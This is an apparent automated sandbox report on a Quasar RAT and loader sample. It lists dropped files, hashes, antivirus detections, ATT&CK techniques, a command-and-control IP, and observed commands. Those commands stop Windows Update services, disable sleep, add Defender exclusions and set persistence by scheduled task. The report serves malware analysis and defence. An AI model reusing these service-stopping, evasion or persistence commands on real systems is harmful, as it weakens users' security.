                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA06D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731CA06D4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C85164 GetVersionExW,0_2_00007FF731C85164
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5fr5gthkjdg71.exe, type: SAMPLE
                    Source: Yara matchFile source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 5fr5gthkjdg71.exe, type: SAMPLE
                    Source: Yara matchFile source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation
                    11
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    21
                    Disable or Modify Tools
                    11
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts12
                    Native API
                    11
                    Windows Service
                    1
                    Abuse Elevation Control Mechanism
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory2
                    File and Directory Discovery
                    Remote Desktop Protocol11
                    Input Capture
                    1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts11
                    Command and Scripting Interpreter
                    2
                    Scheduled Task/Job
                    11
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    Security Account Manager45
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Scheduled Task/Job
                    Login Hook1
                    Access Token Manipulation
                    3
                    Obfuscated Files or Information
                    NTDS231
                    Security Software Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts1
                    Service Execution
                    Network Logon Script11
                    Windows Service
                    1
                    Software Packing
                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable Media1
                    PowerShell
                    RC Scripts912
                    Process Injection
                    11
                    DLL Side-Loading
                    Cached Domain Credentials31
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                    Scheduled Task/Job
                    1
                    File Deletion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
                    Masquerading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Modify Registry
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                    Virtualization/Sandbox Evasion
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Access Token Manipulation
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task912
                    Process Injection
                    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                    Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                    Hidden Files and Directories
                    GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583267 Sample: 5fr5gthkjdg71.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 113 Found malware configuration 2->113 115 Malicious sample detected (through community Yara rule) 2->115 117 Antivirus detection for dropped file 2->117 119 18 other signatures 2->119 10 5fr5gthkjdg71.exe 8 2->10         started        13 F4R5fd8grr.exe 2->13         started        process3 file4 85 C:\Users\user\Desktop\gfiKDLgr58thy4d.exe, PE32+ 10->85 dropped 87 C:\Users\user\DesktopbehaviorgraphR55Qg1hth.exe, PE32+ 10->87 dropped 89 C:\Users\user\Desktop\F4R5fd8grr.exe, PE32 10->89 dropped 16 gfiKDLgr58thy4d.exe 1 2 10->16         started        20 GR55Qg1hth.exe 4 10->20         started        22 F4R5fd8grr.exe 5 10->22         started        157 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->157 159 Found direct / indirect Syscall (likely to bypass EDR) 13->159 signatures5 process6 file7 75 C:\ProgramData\mxergolzfguk\kaptsegthwf.exe, PE32+ 16->75 dropped 93 Multi AV Scanner detection for dropped file 16->93 95 Modifies the context of a thread in another process (thread injection) 16->95 97 Adds a directory exclusion to Windows Defender 16->97 99 Modifies power options to not sleep / hibernate 16->99 24 dialer.exe 16->24         started        27 powershell.exe 23 16->27         started        42 14 other processes 16->42 77 C:\Users\user\AppData\Local\Temp\FA9.tmp, PE32+ 20->77 dropped 79 C:\Program Files\Cuis\bon\Bara.exe, PE32+ 20->79 dropped 101 Antivirus detection for dropped file 20->101 103 Suspicious powershell command line found 20->103 105 Machine Learning detection for dropped file 20->105 111 5 other signatures 20->111 29 cmd.exe 20->29         started        31 cmd.exe 20->31         started        33 powershell.exe 23 20->33         started        35 powershell.exe 20->35         started        81 C:\Users\user\AppData\Roaming\...\Client.exe, PE32 22->81 dropped 107 Uses schtasks.exe or at.exe to add and modify task schedules 22->107 109 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->109 37 Client.exe 2 22->37         started        40 schtasks.exe 1 22->40         started        signatures8 process9 dnsIp10 131 Injects code into the Windows Explorer (explorer.exe) 24->131 133 Contains functionality to inject code into remote processes 24->133 135 Writes to foreign memory regions 24->135 153 4 other signatures 24->153 54 2 other processes 24->54 137 Loading BitLocker PowerShell Module 27->137 44 conhost.exe 27->44         started        139 Uses cmd line tools excessively to alter registry or file data 29->139 141 Uses powercfg.exe to modify the power settings 29->141 143 Stops critical windows services 29->143 58 11 other processes 29->58 145 Modifies power options to not sleep / hibernate 31->145 60 5 other processes 31->60 46 conhost.exe 33->46         started        48 conhost.exe 35->48         started        91 185.148.3.216, 4000, 49730, 49731 MAGNA-CAPAXFI Finland 37->91 147 Antivirus detection for dropped file 37->147 149 Multi AV Scanner detection for dropped file 37->149 151 Machine Learning detection for dropped file 37->151 155 3 other signatures 37->155 50 schtasks.exe 37->50         started        52 conhost.exe 40->52         started        62 13 other processes 42->62 signatures11 process12 file13 64 conhost.exe 50->64         started        66 conhost.exe 50->66         started        68 conhost.exe 52->68         started        83 C:\Windows\Temp\dsarrsulkovb.sys, PE32+ 54->83 dropped 123 Multi AV Scanner detection for dropped file 54->123 125 Protects its processes via BreakOnTermination flag 54->125 127 Modifies the context of a thread in another process (thread injection) 54->127 129 2 other signatures 54->129 70 powershell.exe 54->70         started        signatures14 process15 signatures16 121 Loading BitLocker PowerShell Module 70->121 73 conhost.exe 70->73         started        process17

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    5fr5gthkjdg71.exe76%VirustotalBrowse
                    5fr5gthkjdg71.exe63%ReversingLabsWin64.Backdoor.Quasarrat
                    5fr5gthkjdg71.exe100%AviraTR/Kryptik.cjmob
                    5fr5gthkjdg71.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\Desktop\F4R5fd8grr.exe100%AviraHEUR/AGEN.1307453
                    C:\Users\user\AppData\Roaming\SubDir\Client.exe100%AviraHEUR/AGEN.1307453
                    C:\Program Files\Cuis\bon\Bara.exe100%AviraHEUR/AGEN.1329574
                    C:\Users\user\Desktop\GR55Qg1hth.exe100%AviraHEUR/AGEN.1329574
                    C:\Users\user\AppData\Local\Temp\FA9.tmp100%AviraTR/Dropper.MSIL.Gen
                    C:\Users\user\Desktop\F4R5fd8grr.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\SubDir\Client.exe100%Joe Sandbox ML
                    C:\Program Files\Cuis\bon\Bara.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\GR55Qg1hth.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\FA9.tmp100%Joe Sandbox ML
                    C:\Program Files\Cuis\bon\Bara.exe91%ReversingLabsWin64.Trojan.SpyLoader
                    C:\ProgramData\mxergolzfguk\kaptsegthwf.exe92%ReversingLabsWin64.Packed.Generic
                    C:\Users\user\AppData\Local\Temp\FA9.tmp68%ReversingLabsByteCode-MSIL.Trojan.InjectorX
                    C:\Users\user\AppData\Roaming\SubDir\Client.exe96%ReversingLabsByteCode-MSIL.Backdoor.Quasar
                    C:\Users\user\Desktop\F4R5fd8grr.exe96%ReversingLabsByteCode-MSIL.Backdoor.Quasar
                    C:\Users\user\Desktop\GR55Qg1hth.exe96%ReversingLabsWin64.Trojan.SpyLoader
                    C:\Users\user\Desktop\gfiKDLgr58thy4d.exe92%ReversingLabsWin64.Packed.Generic
                    C:\Windows\Temp\dsarrsulkovb.sys5%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://go.micC0%Avira URL Cloudsafe
                    185.148.3.2160%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    199.232.214.172
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      185.148.3.216true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpfalse
                        high
                        http://nuget.org/NuGet.exepowershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://stackoverflow.com/q/14436606/233545fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, Client.exe, 0000000A.00000002.1835510769.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://go.micCClient.exe, 0000000A.00000002.1831773970.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackoverflow.com/q/11564914/23354;5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpfalse
                              high
                              https://contoso.com/powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://tools.keycdn.com/geo.json5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpfalse
                                      high
                                      https://contoso.com/Iconpowershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/pscore68powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/2152978/23354sCannot5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameF4R5fd8grr.exe, 00000003.00000002.1725151297.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000A.00000002.1835510769.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, F4R5fd8grr.exe, 0000000B.00000002.1884972247.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.148.3.216
                                              unknownFinland
                                              203003MAGNA-CAPAXFItrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1583267
                                              Start date and time:2025-01-02 09:57:06 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 40s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:71
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:5fr5gthkjdg71.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@124/27@0/1
                                              EGA Information:
                                              • Successful, ratio: 91.7%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 104
                                              • Number of non-executed functions: 187
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): Conhost.exe, WmiPrvSE.exe
                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 20.242.39.171, 2.22.50.131, 2.22.50.144, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): usa-east.raptoreum.zone, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                              • Execution Graph export aborted for target powershell.exe, PID 8156 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              TimeTypeDescription
                                              03:57:59API Interceptor1x Sleep call for process: GR55Qg1hth.exe modified
                                              03:57:59API Interceptor1x Sleep call for process: gfiKDLgr58thy4d.exe modified
                                              03:58:01API Interceptor100x Sleep call for process: powershell.exe modified
                                              03:58:06API Interceptor54x Sleep call for process: Client.exe modified
                                              03:58:42API Interceptor14963x Sleep call for process: winlogon.exe modified
                                              08:58:03Task SchedulerRun new task: 3dfx Startup path: C:\Users\user\Desktop\F4R5fd8grr.exe
                                              08:58:12Task SchedulerRun new task: Barac path: C:\Program Files\Cuis\bon\Bara.exe
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              bg.microsoft.map.fastly.netdGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              hcxmivKYfL.exeGet hashmaliciousRedLineBrowse
                                              • 199.232.210.172
                                              WN3Y9XR9c7.exeGet hashmaliciousAsyncRATBrowse
                                              • 199.232.210.172
                                              test.doc.bin.docGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              test.doc.bin.docGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              ROtw3Hvdow.exeGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              vfrcxq.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                              • 199.232.210.172
                                              trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                              • 199.232.214.172
                                              vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                                              • 199.232.210.172
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              MAGNA-CAPAXFIHilix.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.4.122
                                              m68k.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.4.101
                                              na.elfGet hashmaliciousUnknownBrowse
                                              • 185.148.4.104
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.4.111
                                              ptlnPI85Nk.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.17.106
                                              1FYNsY2F1u.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.17.110
                                              BS3MzMsfDa.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.4.115
                                              a2bmiIcQOR.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.4.116
                                              U4HipSF3yX.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.4.107
                                              notabotnet.x86.elfGet hashmaliciousMiraiBrowse
                                              • 185.148.17.101
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\FA9.tmpInstaller.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                softwareinstaller.exeGet hashmaliciousLaplas Clipper, RedLineBrowse
                                                  N2wufLmC74.exeGet hashmaliciousRaccoon Stealer v2, RedLineBrowse
                                                    setup.exeGet hashmaliciousRedLineBrowse
                                                      hZDPlQwZ9D.exeGet hashmaliciousRedLine, XmrigBrowse
                                                        cfBJlHsOsz.exeGet hashmaliciousRedLineBrowse
                                                          FKN6uh7y01.exeGet hashmaliciousRedLineBrowse
                                                            6iWK0k820U.exeGet hashmaliciousRedLineBrowse
                                                              Setup.exeGet hashmaliciousLaplas Clipper, MicroClip, RedLineBrowse
                                                                Loader.exeGet hashmaliciousLaplas Clipper, MicroClip, RedLineBrowse
                                                                  Process:C:\Users\user\Desktop\GR55Qg1hth.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2479617
                                                                  Entropy (8bit):7.887567175274287
                                                                  Encrypted:false
                                                                  SSDEEP:49152:4elUnBKWqx6g25uMThhswijSEGQpETFkNL:45BKtxo5fQIwuhk
                                                                  MD5:B70A5E7260B025E39B8016523A1F2D64
                                                                  SHA1:AEA86A6E4D9BA908D9E141A5D4166BA1E3B1B6A7
                                                                  SHA-256:FD7327848BB13A7A2919447C1818935482527BCC7DE7DA835B907826B7488490
                                                                  SHA-512:A0B63100553D8AE1BBC6471CC0B63499D82FF1503DC17F46CB1AEE07A1332A053C485B74BBE7670638FF0D069496751F9326F9BBB6DF96F794ACB73969B182CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 91%
